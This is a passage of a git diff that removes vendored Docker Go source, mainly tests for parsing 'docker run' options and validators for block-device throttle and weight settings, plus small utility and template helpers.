hostconfig.MemorySwap != 1073741824 { - t.Fatalf("Expected the config to have '1073741824' as MemorySwap, got '%v'", hostconfig.MemorySwap) - } - if _, hostconfig := mustParse(t, anotherValidMemory); hostconfig.MemorySwap != -1 { - t.Fatalf("Expected the config to have '-1' as MemorySwap, got '%v'", hostconfig.MemorySwap) - } -} - -func TestParseHostname(t *testing.T) { - validHostnames := map[string]string{ - "hostname": "hostname", - "host-name": "host-name", - "hostname123": "hostname123", - "123hostname": "123hostname", - "hostname-of-63-bytes-long-should-be-valid-and-without-any-error": "hostname-of-63-bytes-long-should-be-valid-and-without-any-error", - } - hostnameWithDomain := "--hostname=hostname.domainname" - hostnameWithDomainTld := "--hostname=hostname.domainname.tld" - for hostname, expectedHostname := range validHostnames { - if config, _ := mustParse(t, fmt.Sprintf("--hostname=%s", hostname)); config.Hostname != expectedHostname { - t.Fatalf("Expected the config to have 'hostname' as hostname, got '%v'", config.Hostname) - } - } - if config, _ := mustParse(t, hostnameWithDomain); config.Hostname != "hostname.domainname" && config.Domainname != "" { - t.Fatalf("Expected the config to have 'hostname' as hostname.domainname, got '%v'", config.Hostname) - } - if config, _ := mustParse(t, hostnameWithDomainTld); config.Hostname != "hostname.domainname.tld" && config.Domainname != "" { - t.Fatalf("Expected the config to have 'hostname' as hostname.domainname.tld, got '%v'", config.Hostname) - } -} - -func TestParseWithExpose(t *testing.T) { - invalids := map[string]string{ - ":": "invalid port format for --expose: :", - "8080:9090": "invalid port format for --expose: 8080:9090", - "/tcp": "invalid range format for --expose: /tcp, error: Empty string specified for ports.", - "/udp": "invalid range format for --expose: /udp, error: Empty string specified for ports.", - "NaN/tcp": `invalid range format for --expose: NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "NaN-NaN/tcp": `invalid range format for --expose: NaN-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "8080-NaN/tcp": `invalid range format for --expose: 8080-NaN/tcp, error: strconv.ParseUint: parsing "NaN": invalid syntax`, - "1234567890-8080/tcp": `invalid range format for --expose: 1234567890-8080/tcp, error: strconv.ParseUint: parsing "1234567890": value out of range`, - } - valids := map[string][]nat.Port{ - "8080/tcp": {"8080/tcp"}, - "8080/udp": {"8080/udp"}, - "8080/ncp": {"8080/ncp"}, - "8080-8080/udp": {"8080/udp"}, - "8080-8082/tcp": {"8080/tcp", "8081/tcp", "8082/tcp"}, - } - for expose, expectedError := range invalids { - if _, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}); err == nil || err.Error() != expectedError { - t.Fatalf("Expected error '%v' with '--expose=%v', got '%v'", expectedError, expose, err) - } - } - for expose, exposedPorts := range valids { - config, _, _, err := parseRun([]string{fmt.Sprintf("--expose=%v", expose), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.ExposedPorts) != len(exposedPorts) { - t.Fatalf("Expected %v exposed port, got %v", len(exposedPorts), len(config.ExposedPorts)) - } - for _, port := range exposedPorts { - if _, ok := config.ExposedPorts[port]; !ok { - t.Fatalf("Expected %v, got %v", exposedPorts, config.ExposedPorts) - } - } - } - // Merge with actual published port - config, _, _, err := parseRun([]string{"--publish=80", "--expose=80-81/tcp", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.ExposedPorts) != 2 { - t.Fatalf("Expected 2 exposed ports, got %v", config.ExposedPorts) - } - ports := []nat.Port{"80/tcp", "81/tcp"} - for _, port := range ports { - if _, ok := config.ExposedPorts[port]; !ok { - t.Fatalf("Expected %v, got %v", ports, config.ExposedPorts) - } - } -} - -func TestParseDevice(t *testing.T) { - valids := map[string]container.DeviceMapping{ - "/dev/snd": { - PathOnHost: "/dev/snd", - PathInContainer: "/dev/snd", - CgroupPermissions: "rwm", - }, - "/dev/snd:rw": { - PathOnHost: "/dev/snd", - PathInContainer: "/dev/snd", - CgroupPermissions: "rw", - }, - "/dev/snd:/something": { - PathOnHost: "/dev/snd", - PathInContainer: "/something", - CgroupPermissions: "rwm", - }, - "/dev/snd:/something:rw": { - PathOnHost: "/dev/snd", - PathInContainer: "/something", - CgroupPermissions: "rw", - }, - } - for device, deviceMapping := range valids { - _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--device=%v", device), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(hostconfig.Devices) != 1 { - t.Fatalf("Expected 1 devices, got %v", hostconfig.Devices) - } - if hostconfig.Devices[0] != deviceMapping { - t.Fatalf("Expected %v, got %v", deviceMapping, hostconfig.Devices) - } - } - -} - -func TestParseModes(t *testing.T) { - // ipc ko - if _, _, _, err := parseRun([]string{"--ipc=container:", "img", "cmd"}); err == nil || err.Error() != "--ipc: invalid IPC mode" { - t.Fatalf("Expected an error with message '--ipc: invalid IPC mode', got %v", err) - } - // ipc ok - _, hostconfig, _, err := parseRun([]string{"--ipc=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if !hostconfig.IpcMode.Valid() { - t.Fatalf("Expected a valid IpcMode, got %v", hostconfig.IpcMode) - } - // pid ko - if _, _, _, err := parseRun([]string{"--pid=container:", "img", "cmd"}); err == nil || err.Error() != "--pid: invalid PID mode" { - t.Fatalf("Expected an error with message '--pid: invalid PID mode', got %v", err) - } - // pid ok - _, hostconfig, _, err = parseRun([]string{"--pid=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if !hostconfig.PidMode.Valid() { - t.Fatalf("Expected a valid PidMode, got %v", hostconfig.PidMode) - } - // uts ko - if _, _, _, err := parseRun([]string{"--uts=container:", "img", "cmd"}); err == nil || err.Error() != "--uts: invalid UTS mode" { - t.Fatalf("Expected an error with message '--uts: invalid UTS mode', got %v", err) - } - // uts ok - _, hostconfig, _, err = parseRun([]string{"--uts=host", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if !hostconfig.UTSMode.Valid() { - t.Fatalf("Expected a valid UTSMode, got %v", hostconfig.UTSMode) - } - // shm-size ko - if _, _, _, err = parseRun([]string{"--shm-size=a128m", "img", "cmd"}); err == nil || err.Error() != "invalid size: 'a128m'" { - t.Fatalf("Expected an error with message 'invalid size: a128m', got %v", err) - } - // shm-size ok - _, hostconfig, _, err = parseRun([]string{"--shm-size=128m", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.ShmSize != 134217728 { - t.Fatalf("Expected a valid ShmSize, got %d", hostconfig.ShmSize) - } -} - -func TestParseRestartPolicy(t *testing.T) { - invalids := map[string]string{ - "always:2:3": "invalid restart policy format", - "on-failure:invalid": "maximum retry count must be an integer", - } - valids := map[string]container.RestartPolicy{ - "": {}, - "always": { - Name: "always", - MaximumRetryCount: 0, - }, - "on-failure:1": { - Name: "on-failure", - MaximumRetryCount: 1, - }, - } - for restart, expectedError := range invalids { - if _, _, _, err := parseRun([]string{fmt.Sprintf("--restart=%s", restart), "img", "cmd"}); err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with message '%v' for %v, got %v", expectedError, restart, err) - } - } - for restart, expected := range valids { - _, hostconfig, _, err := parseRun([]string{fmt.Sprintf("--restart=%v", restart), "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.RestartPolicy != expected { - t.Fatalf("Expected %v, got %v", expected, hostconfig.RestartPolicy) - } - } -} - -func TestParseHealth(t *testing.T) { - checkOk := func(args ...string) *container.HealthConfig { - config, _, _, err := parseRun(args) - if err != nil { - t.Fatalf("%#v: %v", args, err) - } - return config.Healthcheck - } - checkError := func(expected string, args ...string) { - config, _, _, err := parseRun(args) - if err == nil { - t.Fatalf("Expected error, but got %#v", config) - } - if err.Error() != expected { - t.Fatalf("Expected %#v, got %#v", expected, err) - } - } - health := checkOk("--no-healthcheck", "img", "cmd") - if health == nil || len(health.Test) != 1 || health.Test[0] != "NONE" { - t.Fatalf("--no-healthcheck failed: %#v", health) - } - - health = checkOk("--health-cmd=/check.sh -q", "img", "cmd") - if len(health.Test) != 2 || health.Test[0] != "CMD-SHELL" || health.Test[1] != "/check.sh -q" { - t.Fatalf("--health-cmd: got %#v", health.Test) - } - if health.Timeout != 0 { - t.Fatalf("--health-cmd: timeout = %f", health.Timeout) - } - - checkError("--no-healthcheck conflicts with --health-* options", - "--no-healthcheck", "--health-cmd=/check.sh -q", "img", "cmd") - - health = checkOk("--health-timeout=2s", "--health-retries=3", "--health-interval=4.5s", "img", "cmd") - if health.Timeout != 2*time.Second || health.Retries != 3 || health.Interval != 4500*time.Millisecond { - t.Fatalf("--health-*: got %#v", health) - } -} - -func TestParseLoggingOpts(t *testing.T) { - // logging opts ko - if _, _, _, err := parseRun([]string{"--log-driver=none", "--log-opt=anything", "img", "cmd"}); err == nil || err.Error() != "invalid logging opts for driver none" { - t.Fatalf("Expected an error with message 'invalid logging opts for driver none', got %v", err) - } - // logging opts ok - _, hostconfig, _, err := parseRun([]string{"--log-driver=syslog", "--log-opt=something", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if hostconfig.LogConfig.Type != "syslog" || len(hostconfig.LogConfig.Config) != 1 { - t.Fatalf("Expected a 'syslog' LogConfig with one config, got %v", hostconfig.RestartPolicy) - } -} - -func TestParseEnvfileVariables(t *testing.T) { - e := "open nonexistent: no such file or directory" - if runtime.GOOS == "windows" { - e = "open nonexistent: The system cannot find the file specified." - } - // env ko - if _, _, _, err := parseRun([]string{"--env-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // env ok - config, _, _, err := parseRun([]string{"--env-file=fixtures/valid.env", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Env) != 1 || config.Env[0] != "ENV1=value1" { - t.Fatalf("Expected a config with [ENV1=value1], got %v", config.Env) - } - config, _, _, err = parseRun([]string{"--env-file=fixtures/valid.env", "--env=ENV2=value2", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Env) != 2 || config.Env[0] != "ENV1=value1" || config.Env[1] != "ENV2=value2" { - t.Fatalf("Expected a config with [ENV1=value1 ENV2=value2], got %v", config.Env) - } -} - -func TestParseEnvfileVariablesWithBOMUnicode(t *testing.T) { - // UTF8 with BOM - config, _, _, err := parseRun([]string{"--env-file=fixtures/utf8.env", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - env := []string{"FOO=BAR", "HELLO=" + string([]byte{0xe6, 0x82, 0xa8, 0xe5, 0xa5, 0xbd}), "BAR=FOO"} - if len(config.Env) != len(env) { - t.Fatalf("Expected a config with %d env variables, got %v: %v", len(env), len(config.Env), config.Env) - } - for i, v := range env { - if config.Env[i] != v { - t.Fatalf("Expected a config with [%s], got %v", v, []byte(config.Env[i])) - } - } - - // UTF16 with BOM - e := "contains invalid utf8 bytes at line" - if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // UTF16BE with BOM - if _, _, _, err := parseRun([]string{"--env-file=fixtures/utf16be.env", "img", "cmd"}); err == nil || !strings.Contains(err.Error(), e) { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } -} - -func TestParseLabelfileVariables(t *testing.T) { - e := "open nonexistent: no such file or directory" - if runtime.GOOS == "windows" { - e = "open nonexistent: The system cannot find the file specified." - } - // label ko - if _, _, _, err := parseRun([]string{"--label-file=nonexistent", "img", "cmd"}); err == nil || err.Error() != e { - t.Fatalf("Expected an error with message '%s', got %v", e, err) - } - // label ok - config, _, _, err := parseRun([]string{"--label-file=fixtures/valid.label", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Labels) != 1 || config.Labels["LABEL1"] != "value1" { - t.Fatalf("Expected a config with [LABEL1:value1], got %v", config.Labels) - } - config, _, _, err = parseRun([]string{"--label-file=fixtures/valid.label", "--label=LABEL2=value2", "img", "cmd"}) - if err != nil { - t.Fatal(err) - } - if len(config.Labels) != 2 || config.Labels["LABEL1"] != "value1" || config.Labels["LABEL2"] != "value2" { - t.Fatalf("Expected a config with [LABEL1:value1 LABEL2:value2], got %v", config.Labels) - } -} - -func TestParseEntryPoint(t *testing.T) { - config, _, _, err := parseRun([]string{"--entrypoint=anything", "cmd", "img"}) - if err != nil { - t.Fatal(err) - } - if len(config.Entrypoint) != 1 && config.Entrypoint[0] != "anything" { - t.Fatalf("Expected entrypoint 'anything', got %v", config.Entrypoint) - } -} - -func TestValidateLink(t *testing.T) { - valid := []string{ - "name", - "dcdfbe62ecd0:alias", - "7a67485460b7642516a4ad82ecefe7f57d0c4916f530561b71a50a3f9c4e33da", - "angry_torvalds:linus", - } - invalid := map[string]string{ - "": "empty string specified for links", - "too:much:of:it": "bad format for links: too:much:of:it", - } - - for _, link := range valid { - if _, err := ValidateLink(link); err != nil { - t.Fatalf("ValidateLink(`%q`) should succeed: error %q", link, err) - } - } - - for link, expectedError := range invalid { - if _, err := ValidateLink(link); err == nil { - t.Fatalf("ValidateLink(`%q`) should have failed validation", link) - } else { - if !strings.Contains(err.Error(), expectedError) { - t.Fatalf("ValidateLink(`%q`) error should contain %q", link, expectedError) - } - } - } -} - -func TestParseLink(t *testing.T) { - name, alias, err := ParseLink("name:alias") - if err != nil { - t.Fatalf("Expected not to error out on a valid name:alias format but got: %v", err) - } - if name != "name" { - t.Fatalf("Link name should have been name, got %s instead", name) - } - if alias != "alias" { - t.Fatalf("Link alias should have been alias, got %s instead", alias) - } - // short format definition - name, alias, err = ParseLink("name") - if err != nil { - t.Fatalf("Expected not to error out on a valid name only format but got: %v", err) - } - if name != "name" { - t.Fatalf("Link name should have been name, got %s instead", name) - } - if alias != "name" { - t.Fatalf("Link alias should have been name, got %s instead", alias) - } - // empty string link definition is not allowed - if _, _, err := ParseLink(""); err == nil || !strings.Contains(err.Error(), "empty string specified for links") { - t.Fatalf("Expected error 'empty string specified for links' but got: %v", err) - } - // more than two colons are not allowed - if _, _, err := ParseLink("link:alias:wrong"); err == nil || !strings.Contains(err.Error(), "bad format for links: link:alias:wrong") { - t.Fatalf("Expected error 'bad format for links: link:alias:wrong' but got: %v", err) - } -} - -func TestValidateDevice(t *testing.T) { - valid := []string{ - "/home", - "/home:/home", - "/home:/something/else", - "/with space", - "/home:/with space", - "relative:/absolute-path", - "hostPath:/containerPath:r", - "/hostPath:/containerPath:rw", - "/hostPath:/containerPath:mrw", - } - invalid := map[string]string{ - "": "bad format for path: ", - "./": "./ is not an absolute path", - "../": "../ is not an absolute path", - "/:../": "../ is not an absolute path", - "/:path": "path is not an absolute path", - ":": "bad format for path: :", - "/tmp:": " is not an absolute path", - ":test": "bad format for path: :test", - ":/test": "bad format for path: :/test", - "tmp:": " is not an absolute path", - ":test:": "bad format for path: :test:", - "::": "bad format for path: ::", - ":::": "bad format for path: :::", - "/tmp:::": "bad format for path: /tmp:::", - ":/tmp::": "bad format for path: :/tmp::", - "path:ro": "ro is not an absolute path", - "path:rr": "rr is not an absolute path", - "a:/b:ro": "bad mode specified: ro", - "a:/b:rr": "bad mode specified: rr", - } - - for _, path := range valid { - if _, err := ValidateDevice(path); err != nil { - t.Fatalf("ValidateDevice(`%q`) should succeed: error %q", path, err) - } - } - - for path, expectedError := range invalid { - if _, err := ValidateDevice(path); err == nil { - t.Fatalf("ValidateDevice(`%q`) should have failed validation", path) - } else { - if err.Error() != expectedError { - t.Fatalf("ValidateDevice(`%q`) error should contain %q, got %q", path, expectedError, err.Error()) - } - } - } -} - -func TestVolumeSplitN(t *testing.T) { - for _, x := range []struct { - input string - n int - expected []string - }{ - {`C:\foo:d:`, -1, []string{`C:\foo`, `d:`}}, - {`:C:\foo:d:`, -1, nil}, - {`/foo:/bar:ro`, 3, []string{`/foo`, `/bar`, `ro`}}, - {`/foo:/bar:ro`, 2, []string{`/foo`, `/bar:ro`}}, - {`C:\foo\:/foo`, -1, []string{`C:\foo\`, `/foo`}}, - - {`d:\`, -1, []string{`d:\`}}, - {`d:`, -1, []string{`d:`}}, - {`d:\path`, -1, []string{`d:\path`}}, - {`d:\path with space`, -1, []string{`d:\path with space`}}, - {`d:\pathandmode:rw`, -1, []string{`d:\pathandmode`, `rw`}}, - {`c:\:d:\`, -1, []string{`c:\`, `d:\`}}, - {`c:\windows\:d:`, -1, []string{`c:\windows\`, `d:`}}, - {`c:\windows:d:\s p a c e`, -1, []string{`c:\windows`, `d:\s p a c e`}}, - {`c:\windows:d:\s p a c e:RW`, -1, []string{`c:\windows`, `d:\s p a c e`, `RW`}}, - {`c:\program files:d:\s p a c e i n h o s t d i r`, -1, []string{`c:\program files`, `d:\s p a c e i n h o s t d i r`}}, - {`0123456789name:d:`, -1, []string{`0123456789name`, `d:`}}, - {`MiXeDcAsEnAmE:d:`, -1, []string{`MiXeDcAsEnAmE`, `d:`}}, - {`name:D:`, -1, []string{`name`, `D:`}}, - {`name:D::rW`, -1, []string{`name`, `D:`, `rW`}}, - {`name:D::RW`, -1, []string{`name`, `D:`, `RW`}}, - {`c:/:d:/forward/slashes/are/good/too`, -1, []string{`c:/`, `d:/forward/slashes/are/good/too`}}, - {`c:\Windows`, -1, []string{`c:\Windows`}}, - {`c:\Program Files (x86)`, -1, []string{`c:\Program Files (x86)`}}, - - {``, -1, nil}, - {`.`, -1, []string{`.`}}, - {`..\`, -1, []string{`..\`}}, - {`c:\:..\`, -1, []string{`c:\`, `..\`}}, - {`c:\:d:\:xyzzy`, -1, []string{`c:\`, `d:\`, `xyzzy`}}, - - // Cover directories with one-character name - {`/tmp/x/y:/foo/x/y`, -1, []string{`/tmp/x/y`, `/foo/x/y`}}, - } { - res := volumeSplitN(x.input, x.n) - if len(res) < len(x.expected) { - t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) - } - for i, e := range res { - if e != x.expected[i] { - t.Fatalf("input: %v, expected: %v, got: %v", x.input, x.expected, res) - } - } - } -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go b/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go deleted file mode 100644 index 5024324298..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/throttledevice.go +++ /dev/null @@ -1,111 +0,0 @@ -package opts - -import ( - "fmt" - "strconv" - "strings" - - "github.com/docker/docker/api/types/blkiodev" - "github.com/docker/go-units" -) - -// ValidatorThrottleFctType defines a validator function that returns a validated struct and/or an error. -type ValidatorThrottleFctType func(val string) (*blkiodev.ThrottleDevice, error) - -// ValidateThrottleBpsDevice validates that the specified string has a valid device-rate format. -func ValidateThrottleBpsDevice(val string) (*blkiodev.ThrottleDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - rate, err := units.RAMInBytes(split[1]) - if err != nil { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) - } - if rate < 0 { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :[]. Number must be a positive integer. Unit is optional and can be kb, mb, or gb", val) - } - - return &blkiodev.ThrottleDevice{ - Path: split[0], - Rate: uint64(rate), - }, nil -} - -// ValidateThrottleIOpsDevice validates that the specified string has a valid device-rate format. -func ValidateThrottleIOpsDevice(val string) (*blkiodev.ThrottleDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - rate, err := strconv.ParseUint(split[1], 10, 64) - if err != nil { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) - } - if rate < 0 { - return nil, fmt.Errorf("invalid rate for device: %s. The correct format is :. Number must be a positive integer", val) - } - - return &blkiodev.ThrottleDevice{ - Path: split[0], - Rate: uint64(rate), - }, nil -} - -// ThrottledeviceOpt defines a map of ThrottleDevices -type ThrottledeviceOpt struct { - values []*blkiodev.ThrottleDevice - validator ValidatorThrottleFctType -} - -// NewThrottledeviceOpt creates a new ThrottledeviceOpt -func NewThrottledeviceOpt(validator ValidatorThrottleFctType) ThrottledeviceOpt { - values := []*blkiodev.ThrottleDevice{} - return ThrottledeviceOpt{ - values: values, - validator: validator, - } -} - -// Set validates a ThrottleDevice and sets its name as a key in ThrottledeviceOpt -func (opt *ThrottledeviceOpt) Set(val string) error { - var value *blkiodev.ThrottleDevice - if opt.validator != nil { - v, err := opt.validator(val) - if err != nil { - return err - } - value = v - } - (opt.values) = append((opt.values), value) - return nil -} - -// String returns ThrottledeviceOpt values as a string. -func (opt *ThrottledeviceOpt) String() string { - var out []string - for _, v := range opt.values { - out = append(out, v.String()) - } - - return fmt.Sprintf("%v", out) -} - -// GetList returns a slice of pointers to ThrottleDevices. -func (opt *ThrottledeviceOpt) GetList() []*blkiodev.ThrottleDevice { - var throttledevice []*blkiodev.ThrottleDevice - throttledevice = append(throttledevice, opt.values...) - - return throttledevice -} - -// Type returns the option type -func (opt *ThrottledeviceOpt) Type() string { - return "throttled-device" -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go b/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go deleted file mode 100644 index 2a5da6da08..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/weightdevice.go +++ /dev/null @@ -1,89 +0,0 @@ -package opts - -import ( - "fmt" - "strconv" - "strings" - - "github.com/docker/docker/api/types/blkiodev" -) - -// ValidatorWeightFctType defines a validator function that returns a validated struct and/or an error. -type ValidatorWeightFctType func(val string) (*blkiodev.WeightDevice, error) - -// ValidateWeightDevice validates that the specified string has a valid device-weight format. -func ValidateWeightDevice(val string) (*blkiodev.WeightDevice, error) { - split := strings.SplitN(val, ":", 2) - if len(split) != 2 { - return nil, fmt.Errorf("bad format: %s", val) - } - if !strings.HasPrefix(split[0], "/dev/") { - return nil, fmt.Errorf("bad format for device path: %s", val) - } - weight, err := strconv.ParseUint(split[1], 10, 0) - if err != nil { - return nil, fmt.Errorf("invalid weight for device: %s", val) - } - if weight > 0 && (weight < 10 || weight > 1000) { - return nil, fmt.Errorf("invalid weight for device: %s", val) - } - - return &blkiodev.WeightDevice{ - Path: split[0], - Weight: uint16(weight), - }, nil -} - -// WeightdeviceOpt defines a map of WeightDevices -type WeightdeviceOpt struct { - values []*blkiodev.WeightDevice - validator ValidatorWeightFctType -} - -// NewWeightdeviceOpt creates a new WeightdeviceOpt -func NewWeightdeviceOpt(validator ValidatorWeightFctType) WeightdeviceOpt { - values := []*blkiodev.WeightDevice{} - return WeightdeviceOpt{ - values: values, - validator: validator, - } -} - -// Set validates a WeightDevice and sets its name as a key in WeightdeviceOpt -func (opt *WeightdeviceOpt) Set(val string) error { - var value *blkiodev.WeightDevice - if opt.validator != nil { - v, err := opt.validator(val) - if err != nil { - return err - } - value = v - } - (opt.values) = append((opt.values), value) - return nil -} - -// String returns WeightdeviceOpt values as a string. -func (opt *WeightdeviceOpt) String() string { - var out []string - for _, v := range opt.values { - out = append(out, v.String()) - } - - return fmt.Sprintf("%v", out) -} - -// GetList returns a slice of pointers to WeightDevices. -func (opt *WeightdeviceOpt) GetList() []*blkiodev.WeightDevice { - var weightdevice []*blkiodev.WeightDevice - for _, v := range opt.values { - weightdevice = append(weightdevice, v) - } - - return weightdevice -} - -// Type returns the option type -func (opt *WeightdeviceOpt) Type() string { - return "weighted-device" -} diff --git a/vendor/github.com/docker/docker/utils/debug.go b/vendor/github.com/docker/docker/utils/debug.go deleted file mode 100644 index d203891129..0000000000 --- a/vendor/github.com/docker/docker/utils/debug.go +++ /dev/null @@ -1,26 +0,0 @@ -package utils - -import ( - "os" - - "github.com/Sirupsen/logrus" -) - -// EnableDebug sets the DEBUG env var to true -// and makes the logger to log at debug level. -func EnableDebug() { - os.Setenv("DEBUG", "1") - logrus.SetLevel(logrus.DebugLevel) -} - -// DisableDebug sets the DEBUG env var to false -// and makes the logger to log at info level. -func DisableDebug() { - os.Setenv("DEBUG", "") - logrus.SetLevel(logrus.InfoLevel) -} - -// IsDebugEnabled checks whether the debug flag is set or not. -func IsDebugEnabled() bool { - return os.Getenv("DEBUG") != "" -} diff --git a/vendor/github.com/docker/docker/utils/process_windows.go b/vendor/github.com/docker/docker/utils/process_windows.go deleted file mode 100644 index 03cb855197..0000000000 --- a/vendor/github.com/docker/docker/utils/process_windows.go +++ /dev/null @@ -1,20 +0,0 @@ -package utils - -// IsProcessAlive returns true if process with a given pid is running. -func IsProcessAlive(pid int) bool { - // TODO Windows containerd. Not sure this is needed - // p, err := os.FindProcess(pid) - // if err == nil { - // return true - // } - return false -} - -// KillProcess force-stops a process. -func KillProcess(pid int) { - // TODO Windows containerd. Not sure this is needed - // p, err := os.FindProcess(pid) - // if err == nil { - // p.Kill() - // } -} diff --git a/vendor/github.com/docker/docker/utils/templates/templates.go b/vendor/github.com/docker/docker/utils/templates/templates.go deleted file mode 100644 index 91c376f38f..0000000000 --- a/vendor/github.com/docker/docker/utils/templates/templates.go +++ /dev/null @@ -1,42 +0,0 @@ -package templates - -import ( - "encoding/json" - "strings" - "text/template" -) - -// basicFunctions are the set of initial -// functions provided to every template. -var basicFunctions = template.FuncMap{ - "json": func(v interface{}) string { - a, _ := json.Marshal(v) - return string(a) - }, - "split": strings.Split, - "join": strings.Join, - "title": strings.Title, - "lower": strings.ToLower, - "upper": strings.ToUpper, - "pad": padWithSpace, -} - -// Parse creates a new annonymous template with the basic functions -// and parses the given format. -func Parse(format string) (*template.Template, error) { - return NewParse("", format) -} - -// NewParse creates a new tagged template with the basic functions -// and parses the given format. -func NewParse(tag, format string) (*template.Template, error) { - return template.New(tag).Funcs(basicFunctions).Parse(format) -} - -// padWithSpace adds whitespace to the input if the input is non-empty -func padWithSpace(source string, prefix, suffix int) string { - if source == "" { - return source - } - return strings.Repeat(" ", prefix) + source + strings.Repeat(" ", suffix) -} diff --git a/vendor/github.com/docker/docker/utils/templates/templates_test.go b/vendor/github.com/docker/docker/utils/templates/templates_test.go deleted file mode 100644 index dd42901aed..0000000000 --- a/vendor/github.com/docker/docker/utils/templates/templates_test.go +++ /dev/null @@ -1,38 +0,0 @@ -package templates - -import ( - "bytes" - "testing" -) - -func TestParseStringFunctions(t *testing.T) { - tm, err := Parse(`{{join (split . ":") "/"}}`) - if err != nil { - t.Fatal(err) - } - - var b bytes.Buffer - if err := tm.Execute(&b, "text:with:colon"); err != nil { - t.Fatal(err) - } - want := "text/with/colon" - if b.String() != want { - t.Fatalf("expected %s, got %s", want, b.String()) - } -} - -func TestNewParse(t *testing.T) { - tm, err := NewParse("foo", "this is a {{ . }}") - if err != nil { - t.Fatal(err) - } - - var b bytes.Buffer - if err := tm.Execute(&b, "string"); err != nil { - t.Fatal(err) - } - want := "this is a string" - if b.String() != want { - t.Fatalf("expected %s, got %s", want, b.String()) - } -} diff --git a/vendor/github.com/docker/docker/utils/utils.go b/vendor/github.com/docker/docker/utils/utils.go deleted file mode 100644 index d3dd00abf4..0000000000 --- a/vendor/github.com/docker/docker/utils/utils.go +++ /dev/null @@ -1,87 +0,0 @@ -package utils - -import ( - "fmt" - "io/ioutil" - "os" - "runtime" - "strings" - - "github.com/docker/docker/pkg/archive" - "github.com/docker/docker/pkg/stringid" -) - -var globalTestID string - -// TestDirectory creates a new temporary directory and returns its path. -// The contents of directory at path `templateDir` is copied into the -// new directory. -func TestDirectory(templateDir string) (dir string, err error) { - if globalTestID == "" { - globalTestID = stringid.GenerateNonCryptoID()[:4] - } - prefix := fmt.Sprintf("docker-test%s-%s-", globalTestID, GetCallerName(2)) - if prefix == "" { - prefix = "docker-test-" - } - dir, err = ioutil.TempDir("", prefix) - if err = os.Remove(dir); err != nil { - return - } - if templateDir != "" { - if err = archive.CopyWithTar(templateDir, dir); err != nil { - return - } - } - return -} - -// GetCallerName introspects the call stack and returns the name of the -// function `depth` levels down in the stack. -func GetCallerName(depth int) string { - // Use the caller function name as a prefix. - // This helps trace temp directories back to their test. - pc, _, _, _ := runtime.Caller(depth + 1) - callerLongName := runtime.FuncForPC(pc).Name() - parts := strings.Split(callerLongName, ".") - callerShortName := parts[len(parts)-1] - return callerShortName -} - -// ReplaceOrAppendEnvValues returns the defaults with the overrides either -// replaced by env key or appended to the list -func ReplaceOrAppendEnvValues(defaults, overrides []string) []string { - cache := make(map[string]int, len(defaults)) - for i, e := range defaults { - parts := strings.SplitN(e, "=", 2) - cache[parts[0]] = i - } - - for _, value := range overrides { - // Values w/o = means they want this env to be removed/unset. - if !strings.Contains(value, "=") { - if i, exists := cache[value]; exists { - defaults[i] = "" // Used to indicate it should be removed - } - continue - } - - // Just do a normal set/update - parts := strings.SplitN(value, "=", 2) - if i, exists := cache[parts[0]]; exists { - defaults[i] = value - } else { - defaults = append(defaults, value) - } - } - - // Now remove all entries that we want to "unset" - for i := 0; i < len(defaults); i++ { - if defaults[i] == "" { - defaults = append(defaults[:i], defaults[i+1:]...) - i-- - } - } - - return defaults -} diff --git a/vendor/github.com/docker/docker/vendor.conf b/vendor/github.com/docker/docker/vendor.conf index bb7718bc42..25f74900d0 100644 --- a/vendor/github.com/docker/docker/vendor.conf +++ b/vendor/github.com/docker/docker/vendor.conf @@ -1,116 +1,139 @@ # the following lines are in sorted order, FYI -github.com/Azure/go-ansiterm 388960b655244e76e24c75f48631564eaefade62 -github.com/Microsoft/hcsshim v0.5.9 -github.com/Microsoft/go-winio v0.3.8 -github.com/Sirupsen/logrus v0.11.0 -github.com/davecgh/go-spew 6d212800a42e8ab5c146b8ace3490ee17e5225f9 +github.com/Azure/go-ansiterm d6e3b3328b783f23731bc4d058875b0371ff8109 